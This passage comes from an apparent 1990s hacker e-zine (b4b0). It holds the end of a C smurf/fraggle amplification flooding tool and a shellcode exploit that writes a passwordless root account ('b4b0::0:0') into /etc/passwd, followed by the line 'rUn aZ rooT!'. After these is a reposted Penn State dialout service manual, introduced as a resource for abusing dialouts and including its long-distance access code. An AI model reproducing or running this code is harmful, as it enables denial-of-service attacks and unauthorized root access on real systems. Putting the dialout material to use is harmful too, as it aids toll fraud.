uf); printf("Target = %s\n", *he); printf("Num of Pkts = %d\n", num); printf("Delay = %d\nPacket Size = %d\n", delay, p.ps); printf("Src Port = %d\nDest Port = %d\n", p.src, p.dst); printf("Argc # = %d\nCmdcount # = %d\n", argc, cmdcount); exit(0); #endif srand(time(NULL) * rand() * getpid()); if(jhtype == 1) printf("%si%sCMP ", red, dgrey); else if(jhtype == 2) printf(" %su%sdP ", red, dgrey); printf("%sJ%sa%sckH%sa%smm%se%sr%si%sng %s[%s", dgrey, red, dgrey, red, dgrey, red, dgrey, red, dgrey, cyan, red); printf("%s", *he); printf("%s] (%s. %s= %s1000 %soutgoing packets%s)\n%s", cyan, red, white, red, dgrey, cyan, blue); for (i = 0, cycle = 0; i < num || !num; i++) { if (!(i % 1000)) { printf("."); fflush(stdout); } if(jhtype == 1) { if(uf == 0) smurf(s, sin, inet_addr(bcast[cycle]), p.ps); else if(uf == 1) smurf(s, sin, inet_addr(bcastfile[cycle]), p.ps); else smurf(s, sin, inet_addr(singlebcast), p.ps); } else if(jhtype == 2) { if(uf == 0) fraggle(s, &sin, inet_addr(bcast[cycle]), &p); else if(uf == 1) fraggle(s, &sin, inet_addr(bcastfile[cycle]), &p); else fraggle(s, &sin, inet_addr(singlebcast), &p); } if(uf == 1) if (bcastfile[++cycle] == NULL) cycle = 0; if(uf == 0) if (bcast[++cycle] == NULL) cycle = 0; usleep(delay); } ctrlc(0); } [ end of fear (EOF) ] !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 17 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b #include #include #include codez() { __asm__(" xorl %eax, %eax xorl %ebx, %ebx xorl %ecx, %ecx xorl %edx, %edx movb $5, %al # SYS_open movl $passwd, %ebx # ebx ptr to passwd incb %cl # 1 = O_WRONLY int $0x80 movl %eax, %ebx # fd xorl %eax, %eax movb $19, %al # SYS_lseek decb %cl # offset = 0 movb $2, %dl # SEEK_END int $0x80 xor %eax, %eax movb $4, %al # SYS_write movl $entry, %ecx # ecx ptr to entry movb $30, %dl # count = 30 int $0x80 xor %eax, %eax movb $1, %al int $0x80 # gotta fix later entry: .ascii \"b4b0::0:0:Fatima:/usr:/bin/sh\\n\" passwd: .string \"/etc/passwd\" "); } char large_string[128]; void main() { char *shellcode= (char *)codez; char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); } rUn aZ rooT! !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0[ 18 ]b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b Hi. Everyone really loves dialouts. How do a lot of people find them? scanning, mostly. But its funny. You type in "Dialout" on a search engine and the possi- bilities are almost endless. Check it. This is that PSU dialout everyone and their biological mothers know about. this peice of information contains a lot of helpful stuff, take notes! THE PENNSYLVANIA STATE UNIVERSITY OFFICE OF TELECOMMUNICATIONS OPERATING INSTRUCTIONS for DIALOUT.PSU.EDU Version 1.1 July 6, 1993 U.Ed. OTC 96-3 HTML conversion: August 29, 1995 _________________________________________________________________ Acknowledgments: * Compiled and written by: John Balogh * Content corrections by: Steve Schroeder, Mark Paige * Editorial comments and corrections by: Margaret Gearhart, Peter Weiss _________________________________________________________________ Table of Contents 1. Introduction 1. Purpose of this Document 2. Intended Use 3. Billing 2. Capabilities 1. Terminal Emulation 3. Use 1. Connecting with TELNET 2. "AT" Dialing 3. Trouble 4. Advanced Features 1. Long Distance Billing ("Toll") 2. Required Forms 3. Security Considerations 5. Availability 1. Initial Capacity 2. Future Service Expansion 3. Documentation On-line * References * Glossary * Appendices 1. "AT" Command Set 2. Example DIALOUT Sessions o "Local" (Tymnet) o "800" o "Toll Call" 3. Frequently Called Numbers 4. Authorization Code Implementation o Purpose o Terminology o Procedure o Discontinuing Use of Long Distance Authorization Codes 5. Long Distance Auth Code Data Collection Form _________________________________________________________________ Introduction DIALOUT.PSU.EDU is a service available on Penn State's Data Backbone [3] that allows a backbone user to originate a connection to modem-accessible computers which are not otherwise available on the backbone. The service allows modem calls that are local to the University Park area and calls that attach to toll-free "800" numbers. To place modem calls that will incur a long-distance (toll) charge, authorizing forms (described in section 4 of this document) must be completed first, or a credit-card dialing method must be used. Purpose of this Document The purpose of this document is to describe the use of DIALOUT.PSU.EDU (DIALOUT) on the Penn State Data Backbone to access services that are presently available only to modem users. It will discuss the capabilities, use of DIALOUT, access to advanced features and availability. Intended Use As is stated in other Office of Telecommunications (OTC) write-ups (V.32 User Guide [1], Serial Line Internet Protocol Overview [2]), many users of data processing equipment have experienced a need for "phone line" connections to other computing equipment. A typical case is a user who needs to connect to services on the Penn State Data Backbone, but is not physically located at one of the campuses. The logical solution is an autodial modem. A modem is used to call from the user's site to the nearest convenient modem that is connected to the public access network for the Penn State Data Backbone and establish a terminal session. However, if the user is already connected to the backbone and wishes to communicate with a service such as a Bulletin Board System (BBS) that is not accessible via the backbone, then considerations of modems, phone lines and phone line charges again come to mind. The solution is now available without the need for additional hardware or monthly charges in the DIALOUT service. This service is intended for the user on the data backbone who needs occasional accessto a local bulletin board or one of the timesharing services such as Compuserve or Telenet. It is also available for the user who needs to dial out to a host which is not within the University Park local calling area if the call can be billed to their Penn State budget and fund number. Billing If a backbone user wishes to connect with a dial-in service that would incur a toll call charge, they must complete some forms and obtain signatures to authorize that use of the service. This process will be described in section 4.2 later in this document. DIALOUT is not a free way to make long distance modem connections. Capabilities The DIALOUT modem ports are set to 38,400 bps and the modems are capable of V.32bis, V.32, V.42bis, V.42, MNP5 and all subset standards of these protocols (examples include Bell 103 and V.22bis). If the service that is dialed runs at a lower speed, the communications path will take care of the mismatch in speed. Terminal Emulation The link from the Penn State Data Backbone to the DIALOUT modem ports utilizes a terminal server. The supported terminal emulation is VT100. This emulation may imply some restrictions on the types of services to which a successful connection can be established. In general, if the service can be utilized from a VT100 terminal, it can also be utilized from the backbone, through the DIALOUT service. Use The service can be accessed with a TELNET command to connect to the DIALOUT.PSU.EDU service. Once accessed, the modem is able to understand commands given to it in the "AT" command set, and a call can be placed. Connecting with TELNET Access to the TELNET function varies from computer to computer. In general, the method would be to start a TELNET session as you would with any other host, but specify DIALOUT for the host name. If you have trouble connecting with just the name, try adding the domain; for example, DIALOUT.PSU.EDU. Further details on access are in the section "Availability," later in this document. "AT" Dialing The DIALOUT service modem pool understands the Hayes "AT" dialing command set. A list of available AT commands is listed in Appendix 1 at the end of this document. Once connected to DIALOUT, type the three characters: "a", "t" and "return". It does not matter if they are typed in upper or lower case. The modem should reply with the message "OK" thus: at <--- typed by the user on the DTE's keyboard OK <--- typed by the modem Note that all messages that have the comment "typed by the user" are followed by the "RETURN" or "ENTER" key on the keyboard. Those messages that have the comment "typed by the modem" are sent from the modem to the user's screen; the user does NOT type them. This applies to all the examples that follow in this document. Full examples are included at the end of this document in Appendix 1. Trouble If the connection to DIALOUT is not completed, all the lines may be in use or something may be broken; try again after a few minutes to see if the service was busy. If the connection never completes, call (814) 863-HELP (863-4357) and press 2 for Data Service problems. Report any problem accessing the DIALOUT service. Someone will check it out and get back to you. Please do not send EMAIL to OTC to report a trouble. A timely response to the trouble reported in this manner cannot be guaranteed. Advanced Features The DIALOUT service can be used to place modem calls to numbers that have a toll charge associated with them. The procedure for accomplishing this is detailed in the following paragraphs and in Appendix 4. Long Distance Billing ("Toll") Modem calls to services that are not local (to State College) or "800" calls can be billed to a phone number (account) at Penn State. An Access Code and an Authorization Code are needed to place these types of calls. The Access Code is 175 for any DIALOUT session (or phone line on campus). The Authorization Code must be requested on a special form (see section 4.2). A unique private password (Authorization Code) is then assigned and sent to the requester. Required Forms The form for requesting a "Long Distance Authorization Code" can be found in Appendix 5. It must be submitted to the OTC Business Office for processing. Security Considerations The Authorization Code is the "key" that unlocks access to a billing account associated with a telephone at Penn State. It should be treated the same as physical access to that phone. That is, the Authorization Code should be given ONLY to the person or people who are permitted to charge phone calls to that budget and fund number. Availability This service is available for use only from computers that have access to the Penn State Data Backbone. These computers include, but are not limited to, computers on a network which has a router on the backbone and computers or terminals which connect through any of the dialup or direct serial ports which are connected to the backbone. If a requirement for access from other sites is defined, a letter explaining the intended use, expected load in number of calls per day and expected duration of each call should be written to: Penn State University The Office of Telecommunications Data Services Group 101 Telecommunications Building University Park, PA 16802-5800 Initial Capacity OTC has initially sized this DIALOUT service with a small number of available lines (modems) and will monitor the use of those to determine the requirement for adding additional lines. Future Service Expansion As modems standards advance and hardware/software becomes available, OTC will upgrade the DIALOUT service to take advantage of these standards. Documentation On-line This document is available on-line via anonymous FTP at the site FTP.OTC.PSU.EDU in the files ftp://ftp.otc.psu.edu/pub/otcdoc/dialout.txt (ASCII text) and ftp://ftp.otc.psu.edu/pub/otcdoc/dialout.ps (postscript). The most current version of the document will always reside there. _________________________________________________________________ References "V.32 User Guide" Penn State University The Office of Telecommunications Data Services Group 101 Telecommunications Building University Park, PA 16802-5800 +1 814 863 1354 (Also available from ftp://ftp.otc.psu.edu/pub/otcdoc/v32_user.txt (ASCII text)) "Serial Line Internet Protocol Overview" Penn State University The Office of Telecommunications Data Services Group 101 Telecommunications Building University Park, PA 16802-5800 +1 814 863 1354 (Also available from ftp://ftp.otc.psu.edu/pub/otcdoc/slip.txt (ASCII text) and ftp://ftp.otc.psu.edu/pub/otcdoc/slip.ps (postscript)) "A Guide to the Penn State Data Backbone" Penn State Univ